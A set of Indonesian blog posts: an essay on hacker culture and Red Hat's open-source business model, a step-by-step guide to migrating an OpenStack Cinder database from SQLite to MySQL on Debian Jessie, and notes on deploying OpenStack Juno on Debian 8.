Hacker, aktifitasnya disebut hacking yang menurut Wikipedia adalah orang-orang yang menyukai tantangan intelektual dan melakukan memanipulasi batasan-batasan sistem secara kreatif. Sederhananya, misalnya seseorang mempunyai mobil yang biasanya ada di jalan kemudian dengan cara yang kreatif orang tersebut bisa membuat mobil tersebut berenang di air atau terbang, itulah hacker. Istilah hacker umumnya hanya dibatasi pada dunia komputer dan pemrograman.
Para hacker inilah yang biasanya mengenal sistem dengan sangat baik dan memahami dari A sampai Z sistem tersebut, kita bisa bilang bahwa mereka itu pakar di bidangnya. Di dunia Free / Open Source Software, kita mengenal ada nama Richard Stallman pendiri GNU yang software-nya banyak kita pakai sekarang, atau Linus Torvalds pembuat awal Kernel Linux yang sekarang banyak dipakai dari komputer server sampai Android, dan masih banyak lagi.

Ada yang menarik dari aktifitas hacking tersebut, yaitu kultur mereka. Sebagian besar, mungkin juga semuanya, mereka para hacker itu menyukai aktifitas hacking sebagai hobi, banyak juga diantara mereka yang menghasilkan uang dari hobinya tersebut, tapi itu bukan tujuan utamanya. Kita tahu banyak software Open Source yang sangat bagus kualitasnya, sebut saja Apache dan Nginx yang dipakai sebagian besar web server di Internet. Postfix dan Qmail yang dipakai sebagian besar email server, dan tentu saja distro Linux seperti Debian, CentOS dll. Kita paham bahwa untuk membuat software dengan kualitas seperti itu usahanya tidak sedikit, termasuk waktu, tenaga dan pikiran. Meskipun demikian, kita sebagai pengguna bisa dengan mudah menginstall-nya hanya dengan apt-get install atau yum install, dan harganya? gratis.

Di sisi dunia yang lain, ada budaya yang sama sekali terbalik dari budaya hacking, yaitu budaya korporat yang tujuan utamanya tentu saja menghasilkan uang. Dari segi expertise, masing-masing akan mengatakan bahwa mereka yang terbaik di bidangnya, meskipun pada kenyataannya belum tentu demikian. Salah satu ciri budaya ini yang menurut saya menarik adalah seperti “get the job done”, sedangkan prosesnya, apa dan bagaimana tidak terlalu penting, bahkan jika harus mengeluarkan uang.

Saya bisa memberi analogi, pernahkah kita bertanya misalnya mengapa orang pergi ke restoran atau rumah makan kalau mereka bisa masak sendiri? atau pergi ke bengkel padahal mereka bisa memperbaiki sendiri. Jawabannya tentu saja bermacam-macam tapi dari analogi tadi, kita bisa memahami bahwa sebenarnya antara kultur hacking dan kultur korporat ada titik temu dan diantara banyak perusahaan berbasis Open Source, salah satu yang menurut saya memahami hal ini adalah Red Hat.

Red Hat adalah salah satu perusahaan berbasis Open Source, dipenuhi para hacker dan engineer terbaik dan berhasil menempatkan dirinya pada budaya korporat. Kita berbicara tentang Open Source sebagai sebuah produk, bukan seperti service provider yang menggunakan teknologi Open Source sebagai sarana, seperti Amazon misalnya yang menggunakan teknologi Xen server untuk bisnis cloud nya.

Setiap perusahaan pasti bergantung pada teknologi dan membutuhkan solusi IT, paling sederhananya untuk pengelolaan database. Dan jika bisnis perusahaan tersebut bukan IT, maka akan sangat tidak masuk akal jika perusahaan tersebut sampai invest dalam jumlah besar untuk IT apalagi mempekerjakan seorang pakar IT yang bayarannya mahal. Akan lebih baik dan efisien jika hal-hal yang berhubungan dengan IT di outsource kan ke pihak ketiga.

Tidak jauh berbeda dengan individu, sebuah perusahaan juga perlu merasa aman dan yakin bahwa mereka menyerahkan urusan IT nya di tangan yang tepat, yaitu mereka para pakar yang mengetahui sistem dari A sampai Z, sehingga bisa melakukan “hacking” pada sistem tersebut ketika ada masalah.

Kita ambil contoh antara RHEL dan Debian, dua-duanya distro Linux yang bagus. Bedanya, Debian hanya dikelola oleh komunitas, berbeda dengan RHEL yang dikelola Red Hat. Debian adalah distro yang stabil dan solid, mempunyai user base yang besar dan disukai para hacker dan sysadmin. Saya tidak pernah memakai RHEL tapi pernah menggunakan Fedora yang merupakan versi komunitasnya Red Hat. Dari segi Teknis, menurut Saya Debian lebih bagus manajemen-nya. Antara dpkg-nya Debian dan rpm-nya Red Hat juga lebih bagus dpkg, tapi tentu saja ini dari opini seorang pengguna Debian. Tapi, ketika dibawa ke dunia korporasi maka Debian hampir tidak dapat tempat, RHEL yang dominan. Karena meskipun Debian bagus tapi tidak ada jaminan dari siapapun, dan ketika timbul masalah dengan Debian maka “you’re on your own”, tempat mencari bantuan hanya Google, forum, dan milis. Disini terlihat bahwa faktor penentunya bukanlan apa, tapi siapa. Lihatlah Microsoft windows yang banyak masalah itu.

Pertanyaan berikutnya adalah, mengapa Red Hat bisa berhasil menjual Linux yang gratis itu? jawabannya adalah karena Red Hat ahli Linux dan banyak para pakar di Red Hat sehingga banyak perusahaan mempercayakan solusi IT mereka ke Red Hat.
Kemudian adalah tentang bagaimana public bisa percaya bahwa Red Hat benar-benar ahli di bidangnya. Diatas ada saya sebut bagaimana setiap perusahaan mengklaim bahwa mereka yang terbaik dibidangnya, saya pun bisa. saya tidak bisa desain web tapi Saya bisa saja katakan bahwa Saya ahli desain website, yang pada kenyataannya saya menggunakan jasa pihak ketiga, yang seperti ini sudah sangat umum. Tapi berbeda sekali dengan Red Hat, Red Hat membuktikannya. Contohnya, Red Hat mempunyai kontribusi yang besar di project OpenStack, Red Hat juga merupakan kontributor terbesar di Linux kernel development, dan berbagai project Open Source yang lain. Red Hat juga memproduksi software yang tidak hanya untuk OS Red Hat tapi juga distro lain, network manager misalnya.

Sampai disini, seharusnya skeptisme bisnis berbasis Open Source sudah terjawab. Software Open Source yang kebanyakan gratis juga bisa menjadi peluang, seperti udara yang gratis tapi isi angin di tukang tambal ban juga harus bayar. Adopsi penggunaan software Open Source juga semakin besar yang tentu saja demand kepada tenaga ahli juga bertambah.

Convert Database OpenStack Cinder dari Sqlite3 ke MySQL - Debian Jessie

2016-01-28T18:58:00+08:00

Cinder adalah service block storage di OpenStack. Di instalasi OpenStack Debian 8 juga ada masalah di databasenya.

Problem ini baru Saya ketahui kemudian, padahal Cinder instalasi sebelumnya sudah berjalan. Ketika mau ditambahkan node baru untuk block storage, baru ketahuan ternyata ada problem konfigurasi Cinder.

By default, Cinder menggunakan database sqlite3 sedangkan pada instalasi ini saya menggunakan MySQL. Kesalahan Saya pada waktu itu tidak melakukan verifikasi database, saya hanya lihat service Cinder berjalan dan saya anggap tidak ada masalah, setelah timbul masalah baru diketahui Cinder menggunakan database Sqlite, padahal di konfigurasi cinder jelas-jelas saya menggunakan MySQL.

Konfigurasi Cinder ada di /etc/cinder/cinder.conf.

Kesalahan pertama, di file konfigurasi tertulis sql_connection = mysql://.... yang seharusnya connection = mysql://... Ini harus diganti, bisa dengan sed.

# sed -i 's/sql_connection/connection/' /etc/cinder/cinder.conf

Kesalahan kedua, line koneksi database diatas dibawah section [ssl] yang harusnya di section [database]. Ini juga harus dibetulkan.

Berikutnya, data yang sudah terlanjur ada di Sqlite harus dimigrasikan ke MySQL. Bagi Saya, ini yang susah karena saya tidak paham Sqlite, MySQL pun hanya seadanya saja.

Ini langkah-langkah yang dilakukan:

Matikan semetara foreign key checking:

$ echo "SET foreign_key_checks = 0;" > cinder-schema.sql

Dump skema database, defaultnya database sqlite ada di /var/lib/cinder/cinder.sqlite :

$ sqlite3 /var/lib/cinder/cinder.sqlite .schema | tee -a cinder-schema.sql

Dump data:

$ sqlite3 /var/lib/cinder/cinder.sqlite .dump | \ 
> grep "^INSERT INTO" | tee cinder-data.sql

Sampai sini, sudah ada dua file. cinder-schema.sql yang berisi skema database dan cinder-data.sql yang berisi data. Berikutnya file-file ini harus diedit supaya conform dengan MySQL.

Hapus statement yang tidak perlu:

$ sed -i '/PRAGMA/d; /BEGIN TRANSACTION;/d; /COMMIT;/d' cinder-schema.sql

Di skema tersebut ada kolom binary tidak diquote dan key dengan double quote. keduanya harus di quote dengan backtick (`). Kemudian di file cinder-data.sql, semua table dengan double quote juga harus diganti dengan backtick

$ sed -i 's/\"key\"/`key`/' cinder-schema.sql
$ sed -i 's/binary/`binary`/' cinder-schema.sql
$ sed -i 's/INSERT INTO \"/INSERT INTO `/' cinder-data.sql
$ sed -i 's/\" VALUES/` VALUES/' cinder-data.sql

Setelah itu, gabungkan kedua file diatas:

$ cat cinder-data.sql >> cinder-schema.sql

Hidupkan kembali foreign check:

$ echo "SET foreign_key_checks = 1;" >> cinder-schema.sql

File cinder-schema.sql sudah berisi command yang conform dengan MySQL dan tinggal diimport. Kalau database belum ada, harus dibuat dulu dan kalau database sudah ada, table-table nya harus di drop dulu semua.

Import database, dengan asumsi user database-nya cinder dan nama databasenya cinderdb:

$ mysql -u cinder -p cinderdb < cinder-schema.sql

Restart Cinder:

 # systemctl restart cinder-api.service   
 > cinder-volume.service   
 > cinder-scheduler.service

Sampai disini seharusnya Cinder sudah bisa berjalan dengan Mysql dan komunikasi antar block storage node sudah bisa.

Openstack Deployment di Debian 8

2016-01-22T07:16:00+08:00

Openstack Deployment

Berhubung Debian Squeeze LTS memasuki masa EOL bulan Pebruari nanti dan server yang kami pakai masih menggunakan OS tersebut, maka OS server harus diupgrade ke Debian Stable saat ini, versi 8.2 dengan codename Jessie.
Sebelumnya server-server ini berjalan di lingkungan virtualisasi Xen. Tapi karena saat ini sepertinya setiap orang membicarakan Openstack, maka saya putuskan untuk ikut latah Openstack.

Hypervisor yang dipilih untuk Openstack adalah KVM dengan alasan karena guest os yang berjalan tidak perlu aware virtualisasi seperti ketika menggunakan Xen.

Dan inilah, setelah beberapa hari bersama Openstack dan Debian Jessie.
Tentang Openstack, Openstack adalah cloud platform yang sifatnya modular dan ini merupakan nilai plus karena memberikan kebebasan pilihan kepada sysadmin. Openstack awalnya merupakan project kerjasama antara Rackspace dan NASA, namun sejak 2012 Openstack menjadi project dibawah nama Openstack Foundation.

Ada banyak service Openstack, tapi beberapa saja yang dipakai disini.
Keystone
Keystone adalah identity service dari Openstack, disini semuanya dimanage dari tenant, service, user, dll.

Nova
Nova service untuk computing resource, disini virtualisasi berjalan. Nova bertanggung jawab untuk mengalokasikan resource seperti cpu dan memori. Nova bisa menggunakan hypervisor Qemu, Kvm, Xen, atau mungkin juga VMware vSphere.

Neutron
Neutron service merupakan NaaS (Network as a service). Meskipun hampir setiap hari berhubungan dengan networking, tapi konsep Neutron ini yang paling susah untuk dipahami, untuk kapasitas saya maksudnya. Selain karena baru mengenal Network as a service, Neutron juga menggunakan istilah-istilah yang asing di dunia jaringan seperti floating ip, fixed ip.
Dengan Neutron user bisa bebas memanage jaringan virtualnya sendiri seperti membuat router virtual, mengatur topologi jaringan, menambahkan port di router, manage ip address, firewall dsb, dan itu semua virtual.
Meskipun awalnya susah dipahami, tapi setelah cukup paham, Neutron ini jadi salah satu hal paling keren di Openstack.

Cinder
Cinder adalah block storage service. Cinder bisa menggunakan lvm dan iscsi sebagai backend. Lvm dan iscsi sudah umum di dunia per-storage-an dan Cinder hanya sebagai wrapper, jadi tidak ada yang baru.

Glance
Glance adalah image service, tugasnya memanage image. Image bisa berformat qcow2, img, raw, iso, dll.

Deployment yang ini menggunakan Openstack Juno. Di Debian 8, Openstack belum masuk ke repository stable jadi menggunakan repository Debian Backports. Dan karena belum ada Openstack stable, deployment juga ada kendala disana-sini.
Beberapa diantaranya:
Konfigurasi
Di section keystone di tiap-tiap konfigurasi service, harus menggunakan auth_uri dan identity_uri bukan auth yang terpisah-pisah.

Openvswitch
Neutron menggunakan plugin openvswitch. Masalahnya, pertama service networking di Debian 8 tambah tidak konsisten mengatur link dan network jadi harus menggunakan systemd-networkd. Systemd-networkd lebih bagus dari ifup yang tradisional itu, tapi belum ada konfigurasi untuk openvswitch di systemd-networkd. Jadi waktu boot, network interface yang dipakai openvswitch tidak bisa up otomatis. Workaround yang saya pakai dengan menambahkan baris “/sbin/ip link set eth0 up” di /etc/rc.local.

Dual stack ipv4 dan ipv6
Implementasi dual stack ip di Openstack Juno belum sepenuhnya berjalan karena memang support dual stack baru direncanakn oleh Openstack di release Kilo, Kilo adalah Openstack setelah Juno.
Meskipun ada limitasi tersebut, bukan berarti tidak bisa dual stack. Dengan sedikit shell script akhirnya ipv6 bisa digunakan.

Kesimpulan
Meskipun ada kendala, tapi secara keseluruhan Openstack di Debian 8.2 bisa berjalan dengan baik.
Untuk Openstack, saya merasa platform cloud ini bisa mengakomodasi trend cloud computing yang semakin hari demand-nya semakin besar. Openstack sangat layak dipelajari meskipun harus belajar bahasa Python, karena Openstack ditulis menggunakan bahasa Python. Siapapun yang punya background programming pasti tidak kesulitan mempelajari Python karena bahasanya yang high level.
Menariknya, Openstack menyediakan API untuk memanage service-nya. Jadi kalau berencana membangun bisnis dengan Openstack, hanya tinggal membuat program openstack client nya, atau bisa juga menggunakan horizon, web ui Openstack.

Kalau masih meragukan Openstack, dibawah ini link cloud provider besar yang menggunakan Openstack sebagai bisnisnya:
- Rackspace: https://www.rackspace.com/
- Cloudscaling: http://www.cloudscaling.com/
- Mirantis: https://www.mirantis.com/
- Canonical: http://www.ubuntu.com/cloud/openstack
- Red Hat: https://www.redhat.com/en/technologies/linux-platforms/openstack-platform
- HP: http://www8.hp.com/us/en/cloud/hphelion-platform.html
- And many more…

Lebih lanjut tentang Openstack https://www.openstack.org/